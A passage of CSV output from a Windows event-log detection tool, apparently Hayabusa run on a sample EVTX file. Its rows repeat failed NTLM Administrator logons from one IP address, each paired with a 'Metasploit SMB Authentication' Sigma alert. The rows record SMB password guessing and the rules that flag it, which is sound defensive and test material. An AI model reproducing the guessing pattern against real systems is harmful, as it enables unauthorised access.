Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
